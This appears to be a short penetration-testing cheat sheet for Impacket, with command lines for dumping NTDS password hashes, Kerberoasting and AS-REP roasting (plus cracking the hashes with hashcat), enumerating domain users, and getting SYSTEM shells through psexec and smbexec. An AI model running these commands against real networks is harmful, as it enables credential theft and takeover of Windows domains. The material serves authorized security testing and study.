Impacket

Impacket is a collection of Python classes for working with network protocols.
​GitHub - SecureAuthCorp/impacket​
​Fun with network protocols, using Python and Impacket | Andrea Fortuna​
Related
​Active Directoy​
​TCP 88: Kerberos​
​TCP 389, 636, 3268, 3269: LDAP​
Dump hashes
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Users
This script will gather data about the domain’s users and their corresponding email addresses.
GetADUsers.py -all -dc-ip <ip> <domain>/<user>:<pw>
This example will try to find and fetch Service Principal Names that are associated with normal user accounts.
GetUserSPNs.py -request <domain>/<user>:<pw> // -dc-ip <ip> 
-> Crack hash e.g. using hashcat, to obtain passwords
An application that communicates with the Security Account Manager Remote interface from the MSRPC suite.
samrdump.py <domain>
This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.
GetNPUsers.py <domain>/<user> -no-pass
-> Crack hash e.g. using hashcat
Shell (psexec.py)
PSEXEC like functionality example using RemComSvc.
-> Get a shell as "nt authority\system"
sudo psexec.py [<domain>/]<user>:[<pw>]@<ip>
SMB (smbexec.py)
sudo smbexec.py <user>:<pw>@<target>

Last modified 1yr ago